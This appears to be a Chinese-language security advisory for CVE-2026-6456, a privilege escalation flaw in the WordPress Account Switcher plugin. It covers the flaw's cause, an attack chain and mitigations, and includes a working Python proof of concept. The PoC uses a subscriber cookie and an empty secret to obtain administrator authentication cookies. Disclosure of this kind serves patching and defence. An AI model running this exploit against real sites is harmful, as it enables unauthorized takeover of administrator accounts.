IPBUF安全漏洞报告
English
CVE-2026-6456 CVSS 8.8 高危

CVE-2026-6456: WordPress Account Switcher权限提升漏洞

披露日期: 2026-05-20

漏洞信息

漏洞编号
CVE-2026-6456
漏洞类型
权限提升
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
WordPress Account Switcher 插件

相关标签

权限提升WordPressCVE-2026-6456弱类型比较认证绕过

漏洞概述

WordPress的Account Switcher插件在1.0.2及之前版本中存在严重的权限提升漏洞。该漏洞源于其REST API端点在验证secret时使用了弱比较,并且未验证secret是否为空。攻击者可利用空secret绕过验证,结合缺乏权限检查的API路由,低权限用户可切换至管理员账户,获取完全控制权。

技术细节

该漏洞的核心技术缺陷在于`app/RestAPI.php`文件第111行使用了PHP的弱比较运算符(`!=`)而非严格比较(`!==`)来校验用户输入的`secret`参数,且代码未强制要求`secret`非空。当被攻击的目标管理员从未使用“记住我”功能时,其数据库中的`asSecret`字段为空字符串。此时,攻击者只需发送一个空的`secret`参数,即可满足验证条件(因为空字符串不等于空字符串的判定为假,即不触发错误),从而通过校验。此外,该插件的所有REST API路由均设置了`permission_callback => '__return_true'`,完全绕过了WordPress的标准权限检查机制。这使得仅拥有订阅者权限的攻击者也能调用`wp_set_auth_cookie()`函数,成功为任意用户(包括管理员)设置认证Cookie,进而接管管理员账户。

攻击链分析

STEP 1
信息收集
识别目标网站安装了WordPress Account Switcher插件且版本低于等于1.0.2。
STEP 2
获取低权限账号
在目标站点注册一个新账户或获取一个订阅者级别的低权限账户。
STEP 3
发送利用请求
使用低权限账户的Cookie,向`/wp-json/account-switcher/v1/rememberLogin`端点发送POST请求,参数包含目标管理员ID和空的secret。
STEP 4
权限提升
服务器响应成功后,攻击者获取管理员的认证Cookie,从而以管理员身份登录后台。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://example.com/wp-json/account-switcher/v1/rememberLogin" # Low-privileged user cookie (Subscriber) attacker_cookie = "wordpress_logged_in_xxx=..." # Target user ID (e.g., Administrator ID is usually 1) target_user_id = "1" headers = { "Cookie": attacker_cookie } # Exploit payload: empty secret triggers the loose comparison bypass payload = { "user_id": target_user_id, "secret": "" } response = requests.post(target_url, headers=headers, json=payload) if response.status_code == 200: print("[+] Exploit successful! Admin cookies likely set.") print("[+] Response:", response.text) else: print("[-] Exploit failed.")

影响范围

Account Switcher <= 1.0.2

防御指南

临时缓解措施
建议立即将Account Switcher插件更新至修复了该漏洞的最新版本。如果无法立即更新,应暂时禁用该插件或通过Web服务器配置(如Nginx或Apache规则)阻断对`/wp-json/account-switcher/`路径的访问请求,以防止漏洞被利用。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表